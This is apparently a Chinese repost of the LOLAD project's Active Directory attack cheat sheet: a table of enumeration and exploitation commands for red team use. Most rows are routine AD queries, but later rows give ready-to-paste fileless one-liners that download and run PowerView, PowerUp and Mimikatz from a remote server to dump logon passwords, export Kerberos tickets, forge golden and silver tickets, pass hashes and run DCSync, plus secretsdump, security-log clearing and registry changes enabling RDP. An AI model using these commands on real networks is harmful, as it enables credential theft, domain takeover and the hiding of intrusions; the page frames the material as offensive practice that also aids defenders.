Active Directory漏洞利用技术命令

Active Directory漏洞利用技术命令

LOLAD和 Exploitation项目提供了全面的 Active Directory 技术、命令和功能集合,可用于本地支持攻击性安全操作和红队演习。这些技术利用 AD 的内置工具进行侦察、特权升级和横向移动等策略。了解这些方法有助于防御者加强 AD 配置并提高监控能力。

列表清单

技术/命令名称命令类型参考
收集域 SIDGet-ADDomain | Select-Object SIDPowerShellMicrosoft 文档
列出域控制器nltest /dclist:domainCMDMicrosoft 文档
枚举域组Get-ADGroup -Filter * | Select-Object NamePowerShellMicrosoft 文档
检查 AD 复制状态repadmin /replsummaryCMDMicrosoft 文档
枚举域用户Get-ADUser -Filter * | Select-Object Name, SamAccountNamePowerShellAD 漏洞利用速查表
获取域密码策略Get-ADDefaultDomainPasswordPolicyPowerShellPowerShell 红队
识别域管理员成员Get-ADGroupMember -Identity "Domain Admins"PowerShellMicrosoft 文档
检查 Kerberos 票证政策Get-ADDefaultDomainPasswordPolicy | Select-Object -ExpandProperty KerberosTicketPolicyPowerShellAD 漏洞利用速查表
列出所有组织单位 (OU)Get-ADOrganizationalUnit -Filter *PowerShellMicrosoft 文档
识别具有委派权限的用户Get-ADUser -Filter {TrustedForDelegation -eq $true}PowerShellPowerShell 红队
列出 AD 用户的详细信息Get-ADUser -Filter * -Properties DisplayName, EmailAddress, LastLogonDatePowerShellMicrosoft 文档
使用 SPN 识别账户(Kerberoasting)Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalNamePowerShellAD 漏洞利用速查表
查找管理员账户dsquery user -name *admin*CMDHackTricks – AD 方法论
列出所有域计算机Get-ADComputer -Filter * | Select-Object Name, OperatingSystemPowerShell中等 – AD 枚举
检查组策略对象 (GPO)Get-GPO -AllPowerShell活动目录专业版
列出特权组net group "Domain Admins" /domainCMDHackTheBox – AD 渗透测试指南
查找具有无约束委派的机器Get-ADComputer -Filter {TrustedForDelegation -eq $true}PowerShellPowerShell 红队
检查用户帐户锁定状态Get-ADUser -Filter * -Properties LockedOut | Where-Object {$_.LockedOut -eq $true}PowerShellExploit-DB – AD 枚举指南
识别过期的密码Search-ADAccount -PasswordExpired | Select-Object Name, PasswordExpiredPowerShell渗透测试一切-AD 枚举
查询所有域服务nltest /dsgetdc:domainCMD中级 – 使用 PowerShell 进行 AD 枚举
枚举受信任的域nltest /trusted_domainsCMDGitHub – AD 渗透测试
列出广告网站Get-ADReplicationSite -Filter *PowerShellMicrosoft 文档
获取域林信息Get-ADForestPowerShellCBT Nuggets – 常见的 AD 命令
查找用户的 SID 历史记录(SID 历史记录滥用)Get-ADUser -Filter * -Properties SIDHistory | Where-Object {$_.SIDHistory}PowerShellAD 漏洞利用速查表
检查域控制器证书certutil -dcinfo verifyCMDPowerShell 红队
导入 PowerView 模块powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://remoteserver/PowerView.ps1'); Get-NetUser"PowerShellPowerSploit-PowerView
导入 PowerUp 模块powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://remoteserver/PowerUp.ps1'); Invoke-AllChecks"PowerShellPowerSploit-PowerUp
使用 PowerView 查找域管理员Get-NetGroup -GroupName "Domain Admins" | Get-NetGroupMemberPowerShell (PowerView)PowerSploit-PowerView
使用 PowerView 列出所有域Get-NetDomainPowerShell (PowerView)HackTricks – AD 方法论
使用 PowerView 枚举域信任Get-NetDomainTrustPowerShell (PowerView)中等 – AD 枚举
使用 PowerUp 查找本地权限提升路径Invoke-AllChecksPowerShell(PowerUp)PowerSploit-PowerUp
使用 PowerUp 识别本地管理员Get-LocalGroupMember -Group "Administrators"PowerShellPowerSploit-PowerUp
使用 PowerView 搜索可 Kerberoast 攻击的账户Get-NetUser -SPN | Select-Object servicePrincipalNamePowerShell (PowerView)PowerSploit-PowerView
使用 PowerView 列出域计算机上的所有会话Get-NetSession -ComputerName target-machinePowerShell (PowerView)渗透测试一切-AD 枚举
使用 PowerView 枚举所有域计算机上的本地管理员Invoke-EnumerateLocalAdmin -ComputerName target-machinePowerShell (PowerView)PowerSploit-PowerView
使用 PowerUp 查找弱文件权限Invoke-CheckLocalAdminAccessPowerShell(PowerUp)PowerSploit-PowerUp
使用 PowerUp 检查可写注册表路径Invoke-AllChecks | Select-Object WritableRegPathsPowerShell(PowerUp)PowerSploit-PowerUp
使用 SecretsDump 转储域名哈希secretsdump.py domain/username:password@targetPython(Impacket)Impacket-SecretsDump
使用 PowerView 检查域策略Get-DomainPolicyPowerShell (PowerView)PowerSploit-PowerView
使用 PowerView 识别有趣的 ACLFind-InterestingDomainAclPowerShell (PowerView)PowerSploit-PowerView
枚举域用户 (LDAP)dsquery user -name *CMD活动目录专业版
获取域名信息Get-ADDomainPowerShellMicrosoft 文档
枚举域林Get-ADForestPowerShellMicrosoft 文档
列出域中的所有用户net user /domainCMD活动目录专业版
获取域功能级别Get-ADDomain | Select-Object DomainModePowerShellHackTricks – AD 方法论
列出域组Get-ADGroup -Filter * | Select-Object NamePowerShell中等 – AD 枚举
查询域中的域控制器nltest /dclist:domainCMDMicrosoft 文档
查找 DC 站点信息nltest /dsgetsiteCMDMicrosoft 文档
列出域中的所有计算机Get-ADComputer -Filter *PowerShell活动目录专业版
获取林中的所有子网Get-ADReplicationSubnet -Filter *PowerShellMicrosoft 文档
检查 LDAP 服务器状态nltest /dsgetdc:domain /ldaponlyCMDMicrosoft 文档
获取 AD DNS 区域信息Get-DnsServerZonePowerShellMicrosoft 文档
检查域组成员身份net group "GroupName" /domainCMDCBT Nuggets – AD 命令
获取域用户上次登录时间Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDatePowerShell中等 – AD 枚举
列出所有服务帐户Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select Name, ServicePrincipalNamePowerShell渗透测试一切-AD 枚举
获取域的密码策略Get-ADDefaultDomainPasswordPolicyPowerShell活动目录专业版
列出域计算机上的打开文件共享net view \\target-machineCMDExploit-DB-AD 枚举
查找 Active Directory 站点Get-ADReplicationSite -Filter *PowerShellMicrosoft 文档
列出组织单位 (OU)Get-ADOrganizationalUnit -Filter *PowerShellMicrosoft 文档
检查计算机的组策略gpresult /r /scope computerCMDMicrosoft 文档
查询域中的 DNS 服务器Get-DnsServerResourceRecord -ZoneName "domain.local"PowerShellMicrosoft 文档
枚举全局目录服务器nltest /dsgetdc:/gcCMDMicrosoft 文档
获取域密码过期策略net accounts /domainCMDHackTheBox – AD 渗透测试指南
获取域控制器Get-ADDomainController -Filter *PowerShellMicrosoft 文档
枚举所有组织单位 (OU)Get-ADOrganizationalUnit -Filter * | Select-Object Name, DistinguishedNamePowerShellMicrosoft 文档
列出特定组中的用户Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountNamePowerShellAD 漏洞利用速查表
检查所有用户的上次登录时间Get-ADUser -Filter * -Properties LastLogonDate | Where-Object {$_.LastLogonDate -ne $null} | Select-Object Name, LastLogonDatePowerShell活动目录专业版
列出 Active Directory 站点Get-ADReplicationSite -Filter *PowerShellMicrosoft 文档
在计算机上查找本地管理员net localgroup AdministratorsCMDMicrosoft 文档
获取密码过期的域用户Search-ADAccount -PasswordExpired | Select-Object Name, PasswordExpiredPowerShellHackTheBox – AD 渗透测试指南
查询域林全局目录nltest /gcCMDMicrosoft 文档
检查域管理员帐户状态Get-ADUser -Filter {MemberOf -RecursiveMatch 'Domain Admins'} | Select-Object Name, EnabledPowerShell渗透测试一切-AD 枚举
列出域中的特权帐户Get-ADUser -Filter {AdminCount -eq 1} | Select-Object Name, SamAccountNamePowerShell中等 – AD 枚举
枚举组策略对象 (GPO)Get-GPO -All | Select-Object DisplayName, GpoStatusPowerShellPowerShell 红队
识别具有不受约束委派的计算机Get-ADComputer -Filter {TrustedForDelegation -eq $true} | Select-Object Name, DNSHostNamePowerShellPowerSploit-PowerView
列出所有域组及其成员Get-ADGroup -Filter * | ForEach-Object {Get-ADGroupMember -Identity $_.Name | Select Name, SamAccountName}PowerShellAD 漏洞利用速查表
查找域密码策略设置net accounts /domainCMD活动目录专业版
列出服务主体名称 (SPN)Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalNamePowerShellHackTricks – AD 方法论
枚举 DNS 服务器Get-DnsServer | Select-Object Name, IPAddressPowerShellMicrosoft 文档
列出特定 OU 上的委派管理员Get-ACL "OU=TestOU,DC=domain,DC=com" | Format-ListPowerShell中等 – AD 枚举
识别过期帐户Search-ADAccount -AccountExpired | Select-Object Name, EnabledPowerShellAD 漏洞利用速查表
检查域控制器同步状态repadmin /showreplCMDMicrosoft 文档
查找启用了 LAPS 的计算机Find-AdmPwdExtendedRights -Identity "OU=Workstations,DC=domain,DC=com"PowerShellMicrosoft 文档
查看所有复制子网Get-ADReplicationSubnet -Filter *PowerShellMicrosoft 文档
列出具有高权限的计算机Get-ADComputer -Filter {PrimaryGroupID -eq 512}PowerShell中等 – AD 枚举
获取 AD 域站点和子网Get-ADReplicationSite | Select-Object Name, SiteObjectGUIDPowerShellMicrosoft 文档
枚举密码策略Get-ADFineGrainedPasswordPolicyPowerShellMicrosoft 文档
查找高价值目标(例如具有 SPN 的管理员)Get-ADUser -Filter {ServicePrincipalName -ne "$null" -and MemberOf -like "*Domain Admins*"} | Select Name, ServicePrincipalNamePowerShellAD 漏洞利用速查表
列出所有域组和成员计数Get-ADGroup -Filter * | ForEach-Object {Write-Output "$($_.Name): $((Get-ADGroupMember -Identity $_.Name).Count)"}PowerShell活动目录专业版
查找敏感账户委托Get-ADUser -Filter {TrustedForDelegation -eq $true} | Select-Object Name, SamAccountNamePowerShellHackTricks – AD 方法论
枚举域管理员Get-ADGroupMember -Identity "Domain Admins" | Select Name, SamAccountName, ObjectClassPowerShellAD 漏洞利用速查表
检查 Kerberos 预身份验证已禁用的帐户Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountNamePowerShellMicrosoft 文档
查找计算机上的所有会话quser /server:ComputerNameCMDQuser 命令
确定用户的所有 GPO 权限Get-GPPermission -All -User "UserName" | Select-Object DisplayName, PermissionPowerShellMicrosoft 文档
枚举所有林信任Get-ADTrust -Filter *PowerShellMicrosoft 文档
列出远程计算机上的开放共享net view \\ComputerName /allCMD网络查看命令
检查计算机是否为域控制器if ((Get-ADComputer -Identity "ComputerName").PrimaryGroupID -eq 516) { "Domain Controller" }PowerShellMicrosoft 文档
列出特定 OU 的所有成员Get-ADUser -SearchBase "OU=Users,DC=domain,DC=com" -Filter * | Select Name, SamAccountNamePowerShell活动目录专业版
使用永不过期的密码识别管理员帐户Get-ADUser -Filter {PasswordNeverExpires -eq $true -and AdminCount -eq 1} | Select-Object NamePowerShellHackTricks – AD 方法论
获取支持 LAPS 的计算机Find-AdmPwdExtendedRights -Identity "OU=Computers,DC=domain,DC=com"PowerShell(LAPS)Microsoft 文档
检查 Active Directory 复制队列repadmin /queueCMDMicrosoft 文档
列出缓存中的所有 Kerberos 票证klistCMDKlist 命令
查找密码已过期的用户Search-ADAccount -PasswordExpired | Select-Object Name, SamAccountNamePowerShellMicrosoft 文档
列出域中所有已禁用的帐户Search-ADAccount -AccountDisabled | Select-Object Name, SamAccountNamePowerShellMicrosoft 文档
列出特定组的权限Get-ADGroupMember -Identity "Enterprise Admins" | Select Name, SamAccountNamePowerShellMicrosoft 文档
列出域控制器上的会话qwinsta /server:DomainControllerNameCMDQwinsta 命令
检查域控制器复制状态Get-ADReplicationPartnerMetadata -Target "DC=domain,DC=com"PowerShellMicrosoft 文档
列出远程系统上的本地管理员net localgroup Administrators /domainCMD网络本地组命令
以管理员身份运行 Mimikatz(无文件)IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords'PowerShell(无文件)Mimikatz 备忘单
从内存中转储凭证(无文件)IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords'PowerShell(无文件)Mimikatz 综合指南
提取 Kerberos 票证(无文件)IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::list /export'PowerShell(无文件)ADSecurity-Mimikatz
传递哈希攻击(无文件)IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::pth /user:UserName /domain:domain.local /ntlm:hash /run:powershell.exe'PowerShell(无文件)AkimboCore – Mimikatz
枚举所有注册表项reg query HKLMCMDSS64 – 注册命令
检查自动启动程序reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunCMDHackTricks – 注册表持久性
修改注册表项权限reg add HKLM\Software\ExampleKey /v ExampleValue /t REG_SZ /d "ExampleData" /fCMDSS64 – Reg Add 命令
导出注册表配置单元reg export HKLM\Software\MyKey mykey.regCMDSS64 – 注册导出命令
强制组策略更新gpupdate /forceCMDSS64 – Gpupdate 命令
列出计算机已应用的 GPOgpresult /R /SCOPE COMPUTERCMDSS64 – Gpresult 命令
枚举链接到 OU 的所有 GPOGet-GPLink -Domain domain.local -Target "OU=ExampleOU,DC=domain,DC=local"PowerShellMicrosoft 文档
列出域中的所有组策略Get-GPO -AllPowerShellMicrosoft 文档
在远程计算机上查找本地管理员net localgroup Administrators /domainCMDSS64 – Net Localgroup 命令
查看安全事件日志Get-EventLog -LogName Security -Newest 100PowerShellMicrosoft 文档
清除安全事件日志Clear-EventLog -LogName SecurityPowerShellMicrosoft 文档
启用远程桌面 (RDP)reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fCMDHackTricks – 启用 RDP
金票攻击(无文件)IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21- /krbtgt: /id:500'
在会话中加载票证:
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt '
PowerShell(无文件)HackTricks-黄金票
银票攻击(无文件)IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::golden /user:UserName /domain:domain.local /sid:S-1-5-21- /target:ServerName /rc4: /service:cifs /id:500'
在会话中加载票证:
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt '
PowerShell(无文件)ADSecurity-银票
传递票证攻击(无文件)转储内存中的 Kerberos 票证:
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::tickets'
使用特定的 Kerberos 票证:
IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'kerberos::ptt '
PowerShell(无文件)Mimikatz 备忘单 – 传递票证
转储缓存域凭据(无文件)IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'(需要提升权限)PowerShell(无文件)Mimikatz 综合指南
使用 DCSync (无文件) 转储域凭证IEX (New-Object Net.WebClient).DownloadString('http://servidor_remoto/mimikatz.ps1'); Invoke-Mimikatz -Command 'lsadump::dcsync /domain:domain.local /user:Administrator'PowerShell(无文件)ADSecurity——DCSync 攻击
启用远程桌面 (RDP)reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fCMDHackTricks – 启用 RDP
检查注册表项的持久性reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunCMDSS64 – 注册命令
列出用户权限分配Get-GPResultantSetOfPolicy -User domain\username -ReportType Html -Path C:\gporeport.htmlPowerShellMicrosoft 文档
导出所有组策略对象Backup-GPO -All -Path "C:\GPOBackups"PowerShellMicrosoft 文档
针对本地帐户的传递哈希攻击sekurlsa::pth /user:LocalUser /domain:localhost /ntlm: /run:powershell.exeMimikatzHackTricks – 传递哈希值
查询 Active Directory 复制伙伴repadmin /showreplCMDMicrosoft 文档
列出所有 Active Directory 站点Get-ADReplicationSite -Filter *PowerShellMicrosoft 文档
识别域管理员组成员Get-ADGroupMember -Identity "Domain Admins"PowerShellMicrosoft 文档

截图

Active Directory漏洞利用技术命令

项目地址

https://github.com/LOLAD-Project/LOLAD-Project.github.io

在线地址

https://lolad-project.github.io

https://www.ddosi.org/AD

转载请注明出处及链接

Leave a Reply

您的邮箱地址不会被公开。 必填项已用 * 标注